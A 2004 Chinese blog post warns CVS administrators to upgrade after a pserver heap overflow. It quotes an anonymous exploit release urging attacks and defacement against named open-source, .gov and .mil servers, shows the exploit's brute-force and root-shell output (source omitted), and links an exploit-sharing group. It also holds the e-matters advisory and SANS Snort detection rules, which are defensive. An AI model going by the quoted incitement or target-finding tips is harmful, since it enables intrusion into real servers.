版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明。
https://windtear.net/archives/2004/05/28/000296.html
论文取得了一些进展 慢慢恢复上网时间 短短两周没上网 惊爆 CVS 漏洞 恐怖的是 3 年前他们都做出来 exploit 了 做人太不厚道了 言归正传 请CVS管理员注意 如果还么有升级cvs服务器赶紧升级 主要针对用 cvs 并开放cvs仓库的 我没仔细研究 只是编译 exploit 试了试普通的cvs服务器能直接通过运行权限执行任意指令 http://groups.msn.com/FISHGroups Welcome to FISH Groups !!! Welcome to FISHGroup's msn group!
You can download these released exploits. And you can upload your pravite exploits.
Or improve the released exploits for work on Korean/Japanese/Chinese Simplified /Chinese Traditional/French/Russian/Greman language OS etc. We'll check your exploits. Try your best! Thanks. FISHGroup
2004.4.28 05.20.CVS_Remote_Entry_Line_Heap_Overflow_Root_Exploit_(Linux_FreeBSD_Solaris)-FISH
stable CVS releases up to 1.11.15 and CVS feature releases up to 1.12.7 are exploitable -----> /*Date: 20 May 2004 01:19:15 -0000
From: anonymous
Subject: Declaring Open Season on Open Source Hi, consider this an iALERT Today a nice vulnerability in the CVS was published, this sucks.
Here are some exploits for that vulnerability.
They will exploit any Linux / FreeBSD / Solaris box running CVS.
(The Solaris one is very slow, your bitching, I'd like to see you write it.) We already owned everyone and everything with these exploits years ago, and
in
fact we've all had them sitting on the shelf gathering dust due to lack of
new targets. FUN TESTBED IDEAS:
cvs.apache.org
cvs.perl.com
cvshome.org <-- PLAY "FIND THE SUCKIT"
anoncvs.freebsd.org <-- ls -al /tmp to see how many people who can't hack
own
+this already
cvs.kernel.org
*.gnu.org
*.debian.org
www.openbsd.org <-- TRIPPLE HEAP SOLARIS OWNAGE - THEO IS TOAST HOW TO FIND VICTIMS:
google for "[anon/cvs/anonymous/etc] pserver" .gov and .mil cvs trees are fun I wonder how long it'll take everyone to remove all the SUCKits Prizes may be given for the most imaginative defacement / trojaning. Finally a big thank-you to Steffen Esser of Team TESO Security for being
such an
+amazing whitehat and providing the public with such great Security Product. - The Axis of Eliteness - WARNING - THE AXIS HAZ ACCESS
"Move over saddam, cos you're not as leet as I am"
/* Linux / FreeBSD CVS exploit - January 2001 */ ------ source ... ------- % gcc -lz ... % ./cvs_exploit
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Us4g3 : r34d 7h3 c0d3 d00d ;P % ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs login...
Trying cvsroot = /opt/cvsroot, login = anonymous WRONG !
Trying cvsroot = /opt/cvsroot, login = anoncvs WRONG !
Trying cvsroot = /opt/cvsroot, login = cvsread WRONG !
Trying cvsroot = /opt/cvsroot, login = anon WRONG !
Trying cvsroot = /opt/cvsroot, login = cvs WRONG !
Trying cvsroot = /opt/cvsroot, login = guest WRONG !
Trying cvsroot = /opt/cvsroot, login = reader WRONG !
Trying cvsroot = /opt/cvsroot, login = cvslogin WRONG !
Trying cvsroot = /opt/cvsroot, login = anon-cvs WRONG !
unable to found a valid username % ./cvs_exploit -h 127.0.0.2 -r /opt/cvsroot
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs login...
Trying cvsroot = /opt/cvsroot, login = anonymous WRONG !
Trying cvsroot = /opt/cvsroot, login = anoncvs WRONG !
Trying cvsroot = /opt/cvsroot, login = cvsread WRONG !
Trying cvsroot = /opt/cvsroot, login = anon WRONG !
Trying cvsroot = /opt/cvsroot, login = cvs FOUND !
Trying cvsroot = /opt/cvsroot, login = guest WRONG !
Trying cvsroot = /opt/cvsroot, login = reader WRONG !
Trying cvsroot = /opt/cvsroot, login = cvslogin WRONG !
Trying cvsroot = /opt/cvsroot, login = anon-cvs WRONG !
Bruteforcing cvs password...
Trying login = cvs, pass = WRONG !
Trying login = cvs, pass = WRONG !
Trying login = cvs, pass = anonymous WRONG !
Trying login = cvs, pass = anoncvs WRONG !
Trying login = cvs, pass = anon WRONG !
Trying login = cvs, pass = cvs WRONG !
Trying login = cvs, pass = guest WRONG !
unable to found a valid password % ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot -u _test_
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Bruteforcing cvs password...
Trying login = _test_, pass = WRONG !
Trying login = _test_, pass = WRONG !
Trying login = _test_, pass = anonymous WRONG !
Trying login = _test_, pass = anoncvs WRONG !
Trying login = _test_, pass = anon WRONG !
Trying login = _test_, pass = cvs WRONG !
Trying login = _test_, pass = guest WRONG !
unable to found a valid password % ./cvs_exploit -h 127.0.0.1 -r /opt/cvsroot -u _test_ -p justtest
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Exploiting 127.0.0.1 on a Linux [################### ]
@#!@SUCCESS#@!# RM -RF /tmp/cvs-serv28130
---YOU ARE IN BRO : cvs---
7:05pm up 39 days, 9:52, 3 users, load average: 0.28, 0.06, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 192.168.1.207:S. 20May04 0.00s 0.83s 0.60s ./cvs_exploit -h 127.0.
root pts/2 192.168.1.207:S. 20May04 5days 0.15s 0.15s /bin/bash
root pts/3 192.168.1.207:S. 20May04 6:16m 0.26s 0.26s /bin/bash % ./cvs_exploit -h 127.0.0.3 -r /home/cvs -u _test_ -p justtest
Ac1dB1tCh3z (C)VS linux/*BSD pserver
Exploiting 127.0.0.3 on a Linux [################### ] WRONG !
Exploiting 127.0.0.3 on a *BSD -----> http://security.e-matters.de/advisories/072004.html | Advisory 07/2004 | | CVS remote vulnerability |
| | | | Overview
Concurrent Versions System (CVS) is the dominant open-source version control software that allows developers to access the latest code using a network connection.
Stable CVS releases up to 1.11.15 and CVS feature releases up to 1.12.7 both contain a flaw when deciding if a CVS entry line should get a modified or unchanged flag attached. This results in a heap overflow which can be exploited to execute arbitrary code on the CVS server. This could allow a repository compromise. | | | | Details
While auditing the CVS source a flaw within the handling of modified and unchanged flag insertion into entry lines was discovered.
When the client sends an entry line to the server an additional byte is allocated to have enough space for later flagging the entry as modified or unchanged. In both cases the check if such a flag is already attached is flawed. This allows to insert M or = chars into the middle of a user supplied string one by one for every call to one of these functions.
It should be obvious that already the second call could possibly overflow the allocated buffer by shifting the part after the insertion point one char backward. If the alignment of the block is choosen wisely this is already exploitable by malloc() off-by-one exploitation techniques. However carefully crafted commands allow the functions to be called several times to overwrite even more bytes (although this is not really needed if you want to exploit this bug on f.e. glibc based systems). | | | | Proof of Concept
e-matters is not going to release an exploit for this vulnerability to the public. | | | Disclosure Timeline
| 02 May 2004 | CVS developers and vendor-sec were notified by email Derek Robert Price replied nearly immediately that the issue is fixed | | 03 May 2004 | Pre-notification process of important repositories was started | | 11 May 2004 | Sourceforge discovered that the patch breaks compatibility with some pserver protocol violating versions of WinCVS/TortoiseCVS | | 12 May 2004 | Pre-notified repositories were warned about this problem with a more compatible patch. | | 19 May 2004 | Coordinated Public Disclosure |
| | | CVE Information
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0396 to this issue. | | | | Recommendation
Recommended is an immediate update to the new version. Additionally you should consider running your CVS server chrooted over SSH instead of using the :pserver: method. You can find a tutorial how to setup such a server at
http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt | | | | GPG-Key
[DOWNLOAD NEW GPG-KEY]
pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam
Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC | | | | Copyright 2004 Stefan Esser. All rights reserved. |
-----> the ISC Handlers George Bakos and Mike Poor put together some simple and very good snort rules to detect these cvs exploits ..
.take a look at ISC. http://isc.sans.org/diary.php?date=2004-05-21 Best Regards.
Fabienni Gilles - Security Consultant
K-OTik Security Survey 24/7
http://www.k-otik.com
This just in from Mike Poor:
In response to seeing the cvs exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple snort rules to detect the cvs exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the sid's to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;) alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;) alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;) Deb Hale
Handler On Duty
|
